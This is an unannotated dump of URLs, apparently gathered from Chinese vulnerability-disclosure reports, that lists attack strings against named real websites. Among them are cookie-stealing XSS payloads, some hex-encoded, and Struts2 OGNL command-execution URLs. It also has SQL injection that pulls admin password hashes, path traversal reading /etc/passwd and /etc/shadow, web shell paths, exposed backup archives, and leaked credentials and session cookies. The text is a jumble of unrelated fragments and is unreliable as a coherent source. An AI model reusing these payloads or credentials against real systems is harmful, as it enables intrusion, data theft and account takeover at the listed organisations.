http://beijing.douban.com/series?start=%22%3E%3Cscript%3Ealert%28/Anonymous/%29%3C/script%3E%3Cimg http://guangzhou.douban.com/series?start=%22%3E%3Cscript%3Ealert%28/Anonymous/%29% http://shanghai.douban.com/series?start=%22%3E%3Cscript%3Ealert%28/Anonymous/%29% http://jz.cnse.gov.cn/ http://jz.cnse.gov.cn/jz.cnse.gov.cn.rar http://mail.cnse.gov.cn/ http://app.hujiang.com/cang/taList.aspx?lookuserid= http://bulo.hujiang.com/735850 http://app.hujiang.com/cang/taList.aspx?lookuserid=735850 http://bulo.hujiang.com/9713754/ http://app.hujiang.com/cang/taList.aspx?lookuserid=9713754 http://cctalk.hujiang.com/admin/active/frame_editboard.aspx?showBack=1&boardId=4165&username=6b6f6b656e6a616e65 http://bulo.hujiang.com/group/topic/811699/ http://forum.h3c.com/phpmyadmin/setup/ http://202.106.183.121:8080/csrcfund/IMG!execute.action http://202.106.183.121:8080/zzreport/login.action业务系统 clsid:CCF36A34-3024-46c5-904A-7867A9818DA3 http://avata.sdo.com/ http://jingqu.travel.sohu.com/sis/search/search.sis inurl:gov.cn/structure/ http://ess.lenovomobile.com/regiStep3.aspx?MbrID=6975&code=912348B2-1CE5-4695-9EA0-C4F6F283EAE8 http://wsj.qzlc.gov.cn/ http://wsj.qzlc.gov.cn/backup.rar http://www.crssg.com/ http://www.crssg.com/newshow.php?list=1972 http://www.yokagames.com/product/product/?id=53 http://house.21cn.com/admin/index.asp http://aa\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x31\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e//.swf[/flash http://bbs.d.163.com/forum.php?mod=viewthread&tid=172718984&pid=186356073&page=1&extra=#pid186356073 
http://ln.189.cn/biz/zqservice/zq_toPilotInfoPage.action?redirect%3A%24{%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27ifconfig%27}%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char[50000]%2C%23d.read%28%23e%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://ess.lenovomobile.com/regiStep2.aspx?MbrID=8199 http://ess.lenovomobile.com/shopDtl.aspx?GdsID=A0900001586 http://61.132.107.156:8080 http://book.dangdang.com/list/hotReview_C01.1*.htm http://tieba.56.com/,回复帖子,插入图片后改包提交,后台未对提交的html内容做处理,如提交的内容为 soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:com="http://com.qwserv.itm.api.psl.ws soapenv:Header/ soapenv:Body com:getUser/ soapenv:Body soapenv:Envelope http://down.malataedu.com http://down.malataedu.com/info_details.php?q=312 http://down.malataedu.com/admin/index.php http://xsgl.sz.edu.cn:8008/jsp/login/Login.jsp http://www.bankofluoyang.com.cn/Aboutus.asp?Id=122%20and%201=1 http://xsc.bnu.edu.cn/xscdbadmin/ http://xsc.bnu.edu.cn/admin/admin.php http://www.cbrc.gov.cn/web1.war http://www.cmseasy.cn/wwwroot.rar http://ebidding.lenovo.com.cn/backoffice/getPass.aspx http://www.czsie.com.cn/ http://www.csbidding.com/nhzb/ http://nhzb.czsie.com.cn/nhzb/news_view.jsp?newsID=543 http://www.csbidding.com/nhzb/owner_bid_list.jsp?ownerid=25 http://www.phone366.com/Admin/BasePhoneList.aspx?p1=0&p2=1008&p3=11002010000105268660590&p6=True&fkey=STMemberManger http://www.phone366.com/Admin/BasePhoneListInd.aspx?p1=0&p4=2536&p2=110020100000910&p3=0 http://www.phone366.com/Admin/CompanyList.aspx?p1=0&p2=1008&p3=110020100001052&fkey=STEnterpriseManager 
http://www.phone366.com/Admin/BasePhoneList.aspx?p1=0&p2=1008&p3=110020100001052&p6=True&fkey=STMemberManger http://www.phone366.com/Admin/Site/ShortMessageList.aspx?p1=0&scode=2500&p3=110020100001052&fkey=PTSMSSentRecord&pqc= http://www.phone366.com/Admin/InformationList.aspx?p1=0&p3=2500&fkey=STSentMSGRecord http://www.phone366.com/Admin/Notice/NoticeManage.aspx?type=1&scode=2432&fkey=Notice http://www.phone366.com/Admin/Notice/NewsManage.aspx?type=2&scode=2500&fkey=News http://www.phone366.com/Admin/Notice/InvestManage.aspx?type=3&scode=1008& http://www.phone366.com/Admin/Notice/ActiveManage.aspx?type=3&scode=2416&fkey=Active http://legc.lenovo.com/ http://legc.lenovo.com/lefactory/static-content?contentPath=/etc/passwd http://legc.lenovo.com/ http://222.82.226.140:8880/userlogin.action http://222.82.226.140:8912/JgnhWeb/yhWriteSN.jsp http://222.82.226.140:8913/BtnhWeb/login.jsf http://developer.lenovomm.com/ http://developer.lenovomm.com/windev/ReadImageServlet?path=../../../etc/passwd http://www.oupeng.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php http://manage.gstv.com.cn/Temp/PL.aspx?ID=2 www.cabr.com.cn http://www.cabr.com.cn/kxfzg/info-1.aspx?id=31 http://www.hngsjj.gov.cn/gsjj_login.php?mod=phpcms&file=login http://lyw.sh.gov.cn/db.rar http://www.zfj.gov.cn/db.rar http://ideaclub.lenovo.com.cn/club/index.php?m=goods&c=detail&goods_id=b65403d7fcf111e2add1f285c138d37b,是个插件注入。 www.pzhfzjz.gov.cn http://www.pzhfzjz.gov.cn/cn.aspx http://www.pzhfzjz.gov.cn/1937cN.html http://ms.lenovo.com/list.asp?id=23 http://www.hebsafety.gov.cn/www.rar http://www.zzfda.gov.cn/zzfda.rar http://www.gmj.suzhou.gov.cn/gmj.rar http://www.hebroads.gov.cn/hebroads.rar http://www.sncsjyj.com/news.asp?dhid=192 http://www.sncsjyj.com/zgadmin/login.asp http://www.sncsjyj.com/zgAdmin/SkyWebEditor/admin_style.asp http://ess.lenovomobile.com/shopLst.aspx?RackCode=A11 
http://ess.lenovomobile.com/shopLst.aspx?PageSize=20&PageNum=1&OrderBy=PublishDate+Desc&EchoType=1&RackCode=A11 cookie:ASP.NET_SessionId=h3t1sdbpwidnyd45y2ntf0ni http://119.188.49.210/fc/addfeed?uid=xxxxx&sid=xxxxxxxxxxxxxxx&recentfid=xxxx&recenttime=1377316456&limit=20 Cookie:LTEJTXKKXCLEWJZYUFSJ=QDQCUDYKQOVLRNYWZFYFLLQQZOJPRZCZMHBRCGPZ http://222.247.56.19/m1/login.do http://222.247.56.19:8080/m1/login.do http://222.247.56.19:8080/m1/login.do?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://svwtrainnet.csvw.com/ http://cpi.11185.cn/order/pay.action http://cpi.11185.cn/fs.jsp http://cpi.11185.cn/shell.jsp http://baike.baidu.com/link?url=eTD7zkgnz-QbtFnOpjtvr4V7q-OAZ6tkce2_AWYQmvWZvAKlKSqY4FcJ5DfxZUxK5xhXE1VqVaABCCAlE1rhRq http://reg.scjg.com.cn/前台万能密码登陆,进去后发现一个ewebedit编辑器,然后改了样式就xxoo了。能跨站。。服务器就没去提了,里面有些配置文件什么的,万网工程可不是闹着玩的,不能乱搞。。 http://www.dgase.com/ http://www.dgase.com/myadmin/htmledit/ http://www.dgase.com/myadmin/htmledit/admin_login.asp http://125.93.93.173/myadmin/htmledit/UploadFile/201332115743232.asp http://218.30.21.104/jfpt_gh/ http://pan.baidu.com/share/link?shareid=172262024&uk=4164057933 http://addon.discuz.com/?@mzg_advertise.plugin http://app.finance.ifeng.com/finance/fundhtml/jjjz_kfjj.php?oper_codei=1102&type=10200 http://app.finance.ifeng.com/finance/fundhtml/jjjz_kfjj.php?oper_codei=1102&type=10200 http://app.finance.ifeng.com/finance/fundhtml/jjjz_kfjj.php?oper_codei=1102&type=10200 http://app.finance.ifeng.com/finance/fundhtml/jjjz_kfjj.php?oper_codei=1102&type=10200 
http://bc.ifeng.com/main/c?db=ifeng&bid=18545,18230,3990&cid=2670,68,1&sid=38435&advid=404&camid=4109&show=ignore&url=http://www.baidu.com http://movie.dangdang.com/list/longBestSelling_C05*.01_P1.htm http://ask.lenovomobile.com/ http://xss.tw/Result/Auth/hash/997a073ba4a75cee87acd205cc24e44a URL:http://www.7daysinn.cn/ajax/ajax_login.php Method:POST username:13800138000 password:123456 safecode:x5CC http://www.wandoujia.com/blog/wp-login.php http://developer.wandoujia.com/wp-login.php http://www.wandoujia.com/blog/?author=1 http://www.wandoujia.com/blog/?author=2 http://www.wandoujia.com/blog/wp-login.php http://www.mrtdephoto.net/index/wjb/main.jsp www.mrtdephoto.net/sysuser/city_selzxd.action http://changyan.sohu.com/manage?isvId=389&goal=getCode http://changyan.sohu.com/audit/toAuditByTopic?id=27934871 http://changyan.sohu.com/audit/blackListDel?id=3273¤tPage=1&orderBy=82&keyword= http://changyan.sohu.com/audit/illegalWordDel?id=25445¤tPage=1&orderBy=&keyword= http://changyan.sohu.com/audit/auditedByTopic?id=27934871 http://changyan.sohu.com/audit/toAuditByTopic?id=27934871¤tPage=1 http://changyan.sohu.com/audit/deletedByTopic?id=27934871 http://fuyanjie.com/admin/login http://www.mailsina.com/wwwroot.zip http://wsyc.lqwang.com/admin/ www2.pbx010.com http://www.cifnews.com/Contribute http://etax.sdds.gov.cn/etax2006/public/jsp/PUBLISH.jsp?TZLSH={Oracle注射点 http://jis.sdds.gov.cn/jis/service,其中receivews服务的exportXmlUser操作可以导出所有用户明文信息,包括用户登录名和密码。 soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:web="http://webservice.blf.hanweb.com soapenv:Header/ soapenv:Body web:exportXmlUser soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:string web:exportXmlUser soapenv:Body soapenv:Envelope http://sunzhaopin.sinosig.com/ygbxHr/StaticPageActionDef!personvalue.action 
http://about.sinosig.com/product_productList.action?tag=1&id=269&flag=email http://product.sinosig.com/product_prdtList.action?RankTag=5 http://paycar.sinosig.com/quote_quote.action?id=1543 http://gift.sinosig.com/product_productList.action?tag=1&id=268&flag=mobile http://mana.gaitu.com/FCKeditor/editor/filemanager/upload/test.html http://www.gaitu.com/connn.aspx http://www.gdca.gov.cn/ http://www.gdca.gov.cn/site/24.rar http://job.aku.edu.cn/bbs.asp?id=7980 http://www.jimuu.com/ http://www.jimuu.com/search.html?kw=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E http://career.oppo.com/?q=about/happydetail&id=40 ang:123456 tester:testtest encap:Ethernet F1:CC:05 MTU:1500 txqueuelen:1000 http://pop.pcpop.com/forum.php http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf[/flash http://maillist.chinabyte.com/mail/common/subscribe!subscribeTemps.do Post:mailGroupID http://wap.cc369.cn/downloadProduct?product.systemsID=3 url:http://hodbuy20.shopex.cn/shopadmin/index.php?ctl=passport&act=login&sess_id=1 http://vs.52pk.com/event/groups/26/53/142?kword=88952634 http://218.21.128.211:90/a.rar http://navi.nlc.gov.cn:8080/newspaper_navi/details.jsp?id=1832 http://srsp.nlc.gov.cn/publish/out/DetailDownload.jsp?command=4ae09f94279964c40127a77266140004 http://res3.nlc.gov.cn/rocbook/detail.jsp?bookid=01jh000271 http://navi.nlc.gov.cn/fileadmin http://www.pzhcoal.com/show.asp?id=1785 http://www.ecshop.cn/respond.php?code=alipay&subject=0&out_trade_no=%00%27%20and%20%28select%20*%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28select%20concat%28user_name,password%29%20from%20ecs_admin_user%20limit%201%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20--%20By%20seay http://www.ecshop.com/old/include/config.inc.php https://pmp.shopex.cn/public/adv/000/02/34/85918400.jpg/.php http://mb.shopex.cn/license.txt/.php 
http://key-service.shopex.cn/images/logo.png/.php http://game.52pk.com/search?keys=88952634 http://211.94.187.231/dcdy/download?path=../../../../../../../../../../etc/passwd http://211.94.187.231/dcdy/download?path=../../../../../../../../../../etc/shadow http://www.nxzwfw.gov.cn/nxsite/upload/images/110916093158.doc URL:http://400.10086.cn/m400/authenticationFailure.do URL:http://csp.m800400.com/portal/portalLogin.action http://i400.m800400.com/sysLoginInit.action http://rates.motel168.com/Mains.aspx?city=beijing&hotel=M10001 http://www.suning.com/emall/gameWin_10052_10051_.html http://www.suning.com/emall/SNGameWinCouponCmd?json={%22score%22:10000,%22gameId%22:%221003%22,%22memberNo%22:%22%22}&_=1377479677076 http://bbs.aili.com/manage_27.php http://smb.tp-link.com.cn/search.asp?keywords=1 http://www.ahpfpc.gov.cn/TPL2007/zzjg.php?name=%D0%FB%BD%CC%D6%D0%D0%C4 http://ldrk.ahpfpc.gov.cn/admin/login.aspx http://yjz.ahpfpc.gov.cn/admin/login.aspx http://60.166.5.50:8010/ http://60.166.5.60:8004/ http://60.166.5.60:8880/ http://serviceshop.lenovo.com.cn/WebAjaxHelper.ashx?commentsno=ab637223-3828-473c-a2be-058e346ec925&sysun=wsilenovo&sysup=wsi@123lenovo&type=commentsused&_=1377485978815 http://blog.ccstock.cn/search/index?type=blog&keyword=%27 http://zhibo.job1001.com/ygxq.php?zbid=126 http://appwiz.lenovo.net http://appwiz.lenovo.net/zecmd/zecmd.jsp http://life.sinosig.com/lifeinsurance/psychological/psychological!list.action http://auth.sinosig.com/auth/login_lifeLoginBar.action http://yyclub.sinosig.com/yyclub/activity!detail.action?id=341 http://service.sinosig.com/product_productList.action?tag=1&id=267&flag=email http://university.ruijie.com.cn/ http://university.ruijie.com.cn/journal/fck/CPKX/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/d:/awstats/wwwroot/cgi-bin http://www.labclub.com.cn/ELabClub/Article/UploadDondTai.aspx http://ec0021.ruijie.com.cn/ResumeList.aspx 
http://support.ruijie.com.cn/info.php http://iservice.lenovomobile.com/ETS/Engineer/ExamPapersw.aspx?paperCode=201202164&chutiType=1&examCode=201202165&startTime=00:46:22&endTime=23:46:25&paperTitle=OP%E5%8A%A9%E7%90%86%E8%80%83%E8%AF%95%E8%AF%95%E5%8D%B7&idencode=201202172&eptype=1&cpid=0 http://rtoct.mspcloud.cn/rtc_client/RTCWebClient/chat.action http://218.80.247.119/m1/login.do http://ideaclub.lenovo.com.cn/club/index.php?m=member&c=reg&f=getPlace&item_id=ae03462ce1fb11e29c5fc89cdcd8545b http://ah.189.cn/service/electronic/card/init.action http://www.dascomsoft.com/)开发的精品课程建设平台系统存在struts2漏洞,由于很多学校使用该系统,故个人认为影响较大。 http://www.dascomsoft.com/website/cases.aspx列出了300所高校使用该系统。 http://kefu.hujiang.com/feedback/ http://xss.tw/xxx ftp://125.72.125.103 http://admin.eguan.cn/admin.php?mod=login.login&cmd=post http://gifted.edb.gov.hk/BIA/registration/briefing.php?school_name=%27&submit=GO&filtertype=simplesearch http://act.766.com/tougao2/ http://www.icdcxc.com/ http://98.126.53.92:2382/a-admin/admink.asp http://3g.dzwww.com/m/article/content.html http://www.lkpower.com/templates/T_Second/index_150.html http://222.132.***.***:8080/lkoa6/Editor/ewebeditor.htm?id=txtNR&style=coolblue&&savepathfilename=myText3&savepath=../LKUPLOADFILE/dzyjuploadfiles/love.asp/ love.asp/20130826202310486.jpg http://mob.17173.com/news/class/newgame.php?id=1 http://mob.17173.com/news/class/newgame.php?id=1 http://mob.17173.com/news/class/newgame.php?id=1 http://www.crep.com.cn http://www.cerp.com.cn/admin_admin.asp http://www.cr-dengfeng.com http://www.cr-dengfeng.com:8000,协同办公系统一枚 http://caigou.htinns.com/website/supplierportal/jpoconfirm.aspx?objectid=72318&source=~%2fsupplierportal%2fawaitinglist.aspx http://caigou.htinns.com/website/supplierportal/spohistory.aspx?objectid=69552&source=~/supplierportal/pohistorylist.aspx http://caigou.htinns.com/website/supplierportal/jpohistory.aspx?objectid=75958&source=~/supplierportal/pohistorylist.aspx 
http://caigou.htinns.com/website/supplierportal/jpohistory.aspx?objectid=68202&source=~/supplierportal/pohistorylist.aspx http://www.soso.com/q?w=site%3Ayunying.htinns.com&lr=&sc=web&ch=w.p&num=10&gid=&cin=&site=&sf=0&sd=0&nf=&pg=5 http://yunying.htinns.com/OpenCheck/PraiseList.aspx?hotelid=2001221 http://yunying.htinns.com/OpenCheck/PraiseList.aspx?hotelid=3001601 http://wireless.yun.vip.xunlei.com/update?version=1.0.3.51&product_id=39其中字段version存在注入点 http://shop09.szneiyi.com/JProject/page/com/vip/login.jsp http://www.nctlj.com.cn/mapbuyticket.aspx ftp://116.10.242.186/ http://ask.goodbaby.com/user/question.html http://lelink.lenovo.com.cn/getpwd_dos.php?resetpwd=getpwdbyemail&uid=17399&id=rKgm http://qscd.cofco.com:8080/khsafety/login!doLogin.action http://e-learning.lenovo.com.cn/user/registration/ajax/group/3/shop/2777 http://onboarding.lenovo.com/ http://onboarding.lenovo.com/demo/login.action http://onboarding.lenovo.com/news/detail.php?id=323 http://voice.lenovo.com.cn:80/Video/amember/pic/1/id/2 http://saas.jspark.org.cn/HomeNew/index.aspx http://saas.jspark.org.cn/ScriptResource.axd?d=h4z6_ll8xCq5fkDXNkUv4dzJqNWeEE5Nwp-8BMDmBiQAAAAAAAAAAAAAAAAAAAAA0 http://www.eguan.cn/talk/uplife.php http://218.75.110.139:81/license!getExpireDateOfDays.action http://safe.oupeng.com http://zone.wooyun.org/content/5548,http://drops.wooyun.org/papers/382 http://www.wooyun.org/ofc/open-flash-chart.swf,页面返回“you http://www.wooyun.org/ofc/open-flash-chart.swf?data=/ajaxdo.php?module=corptypecount%26type=%26id=2,我们大致可以判断是在 http://www.wooyun.org/ofc/open-flash-chart.swf?data=/ajaxdo.php/../ www.wooyun.org http://zone.wooyun.org/content/5429 font-size:18px display:none;},1,,1& ftp://315.sh.cn/ http://fpzj.cq.gov.cn/index.html http://fpzj.cq.gov.cn/FPApp/wbxx/news/list.jsp?id=1 http://ms.lenovo.com/detail.asp?id=18 http://ms.lenovo.com/fwml2.asp?kk=9 http://220.181.152.196/ ftp://220.181.152.196/ http://www.wushu.com.cn/ 
http://www.71ab.com/SearchCompany.aspx?querytxt=a&province=%E5%8C%97%E4%BA%AC%E5%B8%82 http://blog.safe.renren.com http://blog.safe.renren.com/?author=1 http://blog.safe.renren.com/?author=50 http://blog.safe.renren.com/wp-login.php linhuihua:111111 lv:111111 http://www.cps.com.cn/gongchengjs/show.php?id=272407 http://spm3.lenovo.com.cn/sv/bs_user/bs_user_addrdisplay.aspx?user_id=34959270 http://spm3.lenovo.com.cn/sv/bs_user/bs_user_addrdisplay.aspx?user_id=34959267 http://spm3.lenovo.com.cn/sv/bs_user/bs_user_addrdisplay.aspx?user_id=34959266 http://jhw.lishui.gov.cn/zwxx/xwdt/p020070126602414593398.xls http://www.zixing.gov.cn/comm_front/email/uploadImageFile_do.jsp http://www.xnzwgk.cn/xxgkweb/gkzn.aspx?unit=JF919 http://about.baicai.com/news/view-news.php?nid=98 http://i.youku.com http://www.vans-china.cn http://www.vans-china.cn/manuel/supplier_manuel.htm http://www.pjedu.net/login/CmsSubmit.do http://www.jiangning.gov.cn/login/CmsSubmit.do http://www.pjedu.net/和jeecms的通用命令执行可证明) http://www.17draw.com/Lessons/viewclass?id=49 http://119.254.72.50/ http://119.254.72.50/index.php?doAction=00010001&Step=../../../../../../../../../../etc/passwd%00.jpg http://119.254.72.50/index.php?doAction=00010001&Step=../../../../../../../../../../etc/resolv.conf%00.jpg http://119.254.72.50/index.php?doAction=00010001&Step=../../../../../../../../../../etc/sysconfig/autofs%00.jpg http://220.179.115.68/newsdisp.asp?id=90858 http://www.xnlk.gov.cn/news_more.asp?lm2=90 http://www.xiuning.gov.cn/newsdisp.asp?id=91139 http://www.xnztb.gov.cn/news_more.asp?lm=2 http://www.xnxkz.gov.cn/web.asp?typeid=2111111407 http://www.xntj.gov.cn/newsweb/newsassort.asp?assort_id=74 http://www.xnaixin.cn/item/show.asp?m=116&d=4 http://www.xnczw.gov.cn/news_more.asp?lm=2 http://www.xnbj.gov.cn/news_more.asp?lm=73 http://www.xncgw.gov.cn/news_more.asp?lm=4 http://www.xnzs.gov.cn/showdiary.asp?id=16 http://www.xnhc.gov.cn/news_more.asp?lm2=72 http://www.xnsf.gov.cn/type.asp?typeid=22 
http://www.xnswj.gov.cn/news_more.asp?lm2=75 http://www.xnzgh.org/web.asp?typeid=2111111407 http://www.xnhj.gov.cn/news_more.asp?lm2=72 http://www.xnyf.gov.cn/news_more.asp?lm=73 http://www.xzyyey.cn/news_more.asp?lm=73 http://www.xnga.gov.cn/news/list.asp?cat_id=7 ftp://crland.com.hk/ http://login.gaitu.com/findpwd.html http://www.ptsn.net.cn/standard/plan.php?plan_id=89 http://www.ptsn.net.cn/article_new/show_article.php?article_id=jhbbwj_f0136a2c-2480-917f-a841-4df06ba80295 http://jwxt.ecupl.edu.cn/ http://222.72.92.114/ http://hzclub.vanke.com/login.aspx?exit=1 http://cc.vanke.com/html/paymentlpinfo.aspx?id=616 http://lipton-icha.youku.com/ http://data.auto.ifeng.com/price/searchAll.do encap:Ethernet AF:17:12 addr:10.32.24.51 Bcast:10.32.24.255 Mask:255.255.255.0 feaf:1712/64 Scope:Link MTU:1500 packets:14243368527 packets:17554013928 txqueuelen:1000 http://www.tianya.cn/api/tw?method=tweet.ice.insert http://yinshua.gaitu.com/ManaFunc/login.aspx http://support1.lenovo.com.cn:80/ http://yixin.im/api/dlfromsms http://xxx.xxx.xxx.xxx/quick_setup0.asp http://xxx.xxx.xxx.xxx/wan.asp http://xxx.xxx.xxx.xxx/password.asp http://www.cadillac.com.cn/InterFace/DownloadList.aspx?p3=8126&type=&car=7 http://www.bidding.citic.com/ http://product.it.sohu.com/core/vote.php http://123.232.123.23/index.jsp http://www.auxgroup.com/newsdetail.aspx?Nodecode=00020007&Id=5724 http://crm.lzl98.com/ http://mp.gaitu.com/qiye-list.html?k= http://diy.gaitu.com/Content.aspx?id=2335%20and%201=1 http://info.shfg.gov.cn/%283dwuyg55uukszd55tkiet1yk%29/login.aspx?ReturnUrl=%2flogout.aspx%3fReturnUrl%3d%252fDefault.aspx http://weibo.com/find/f?type=2&search=1&comp=%E7%9F%A5%E4%B9%8E&page=1 http://www.csh.edu.cn/unitCode.action http://www.cdce.cn/www.cdce.cn.rar http://msdn.microsoft.com/en-us/library/ms682425.aspx http://zfcg.zgc.gov.cn/backup.rar http://tieba.baidu.com/f?ie=utf-8&kw=贴吧名字&autolike=1 http://www.nongmintv.com/ucenter/reset.php http://zone.wooyun.org/content/674 
http://my.zhenpin.com/third_party_login/api/sina_api.php接口,以获取珍品网的认证 http://www.edu11.net/periodical.php?pid=1 http://www.phone366.com/Admin/Login.aspx http://ldxx.baoji.gov.cn/msgShow.php?id=57330 http://kpzl.baoji.gov.cn/Newspage/show.php?id=13548 http://ldxx.baoji.gov.cn/post.php?id=36 www.anxin.net/editor/upload.asp文件上传地址,提交隐藏了,不过应该有大神可以利用吧? www.anxin.net/%E5%8D%87%E7%BA%A7%E8%AF%B4%E6%98%8E.txt配置文件访问。 http://wooyun.org/whitehats/乌云官方 http://g.baofeng.com/login inurl:news.asp?DHID= http://www.xinnet.com/domain/check.do?method=domfloSchres&domainSuffixType=0&prefix=a&suffix=.com http://www.zhihu.com/question/21551410 http://www.zhihu.com/people/s0s0 http://weibo.com/s0s0x00 http://cart.gaitu.com/confirmord.aspx?ptype=y&pid=2174 http://i.gaitu.com/ajaxpage/AjaxOrders.aspx http://yinshua.gaitu.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html http://www.hljjx.gov.cn/hljjx/demo!wjdc_login.action http://r.oupeng.com/tmp/users.sql http://www.siminwenhua.com/webadmin/ http://lisniuse.blog.sohu.com/a/home/entry/delete.htm http://www.jiemai-tech.com/admin/infoManage.do http://fg.yicha.cn/front/game_detail.do?objtype=byx&objid=hy1001&site=0&UA=&phone=&YCUID= http://www.zjsports.gov.cn/admin/images/index.jsp/index.jsp http://jy.ccsu.cn http://jy.ccsu.cn/admin/adminlogin.asp ftp://**.**.** http://i.sohu.com/a/app/mblog/save.htm?_input_encode=UTF-8 http://www.tssfda.gov.cn/index.html http://chuangxinren.com http://chuangxinren.com http://chuangxinren.com/robots.txt/a.php http://119.188.128.20/ http://365e.sgcam.net/NewsList.aspx?id=34在对id的的传输值没有做任何过滤,直接导入注射漏洞的产生。虽然或许是边缘业务,但是对用户的体验还是不好的 http://app2.gzstats.gov.cn/auth/login.action http://jtsjy.moc.gov.cn:88/indexAction.do http://jtsjy.moc.gov.cn:88 http://onboarding.lenovo.com/news/news.php?callback=json_data&page=1&pageSize=20&c_code=ae http://g.baofeng.com/forget_password www.zbird.com.fastcdn.com www9.zbird.ccgslb.com.cn http://s190.gaitu.com/ 
http://s190.gaitu.com/psdUpload/JzPsdClientCallback.asmx?op=AdminID www.jiedong.gov.cn http://service.v5shop.com/Help.aspx?id=462 http://www.92xmf.com:80/products.aspx?classid=7 http://union.baofeng.com/login http://119.188.128.7:8000/ http://119.188.128.28/ http://cdnlt.baofeng.com/ https://passport.baidu.com/aclogin.php?queryWord= display:none http://at.db.766.com/search.php?search.php?action=8&start=16&end=30&gwpage=3#gw http://www.user.jqw.com/del.aspx http://bz.5sing.com/down/1916771 http://bz.5sing.com/1916771.html http://drops.wooyun.org/wp-content/themes/GZai/kindeditor/plugins/multiimage/images/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://zone.wooyun.org/upload/avatar/avatar_12_b.jpg http://zone.wooyun.org/content/6252 http://nc.vanke.com/webserver/indexnew.aspx?classid=1 http://read.yunduan.cn/api/app/d?f=../../../../../../../../etc/passwd&v=2 http://lvyou.baidu.com/user/47783f2e03e2d128a581731f http://www.gz3s.cn/admin/left.php http://www.gz3s.cn/admin/addArticle.php http://home2.xywy.com/index.php?type=index&uid=15363020 http://home2.xywy.com/index.php?type=index&uid=15363020 http://www.loess.csdb.cn/pdmp/index.action http://www.loess.csdb.cn/pdmp/shell.jsp http://www.tpabun.csdb.cn/geo/cn/geoDataSetsSearchPage.do http://www.tpabun.csdb.cn/geo/t.jsp http://szkh.gtja.com/kh/Info.aspx?m=20130306133305887755 http://www.epsr.cn/fckedit/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/aspx/connector.aspx http://tixing.qq.com/cgi-bin/jump?url=http://b2.wap.soso.com/zxcvb/forward_direct.jsp?url=9yg1NZ3UVi4-95lmZie1cFAAouspAEmM&type=wap&g_ut=2&login=0&icfa=1301080 http://whitevitality.tudou.com/usercontrols/uc_videosingle.aspx?store_id=5401country=l06&type=M&class=M04 http://tiku.51taoshi.com/nmcHDtouch/index.php/Login/adminlogin http://121.61.118.178/NmcAdmin2/ http://bbs.dlxww.com/home.php http://bbs.dlxww.com/home.php http://wsnj.zgaic.gov.cn/i!index.action 
http://139.mobzj.com http://www.chuanhui.gov.cn/ http://www.ruijie.com.cn/锐捷网络官网某处存在sql注入漏洞,危害比较大。 http://www.ruijie.com.cn/cysjds/DemandGameModel.aspx?dguid=d7b3fc96-c014-4257-8231-dd9da58da1ad http://www.cgps.ac.cn/index.action http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534 http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534 http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534 http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534 http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534 http://club.cntv.cn/reserve/outputiframe/fansandlinks.php?clubid= http://club.cntv.cn/reserve/outputiframe/fansandlinks.php?clubid=14899170 http://www.shanhaiguan.gov.cn/ http://ssports.smgbb.cn/Live/show/id/581614 http://tu.07073.com/services/service.php?m=index&a=share&width=190&cate=66 http://tu.07073.com/services/service.php?m=u&a=album&width=190&home_id=10 http://tu.07073.com/services/service.php?m=index&a=share&width=190 http://supply.zte.com.cn/sscm/ui/web/Application/kxscm/Index.aspx?TYPE=0 https://supply.zte.com.cn/ui/web/application/kx/freight/contracttrans/contracttransinfo.aspx?computerno=f3f9d3eae828f321&contractheaderid=d9b6451285533084&lang=cn&planno=a12f490b376dc1016d0514ef03a1aae4&type=19### https://supply.zte.com.cn/ui/web/Application/kxscm/Freight/FreightFeedback/FeedbackInfoShow.aspx?Flag=1&FreightNoCMS=DFDD0EC28A533F13667BBC1AED113F6B http://analytics.client.letv.com/client/feedback/video6/feedback_show.php http://jingyan.baidu.com/user/npublic?un=orangefishll http://jingyan.baidu.com/域名下分享一篇文章,但是需要get请求才行,测试了一下可以。 http://jingyan.baidu.com/article/preview?eidEnc=0964eca22049fa8285f536cc 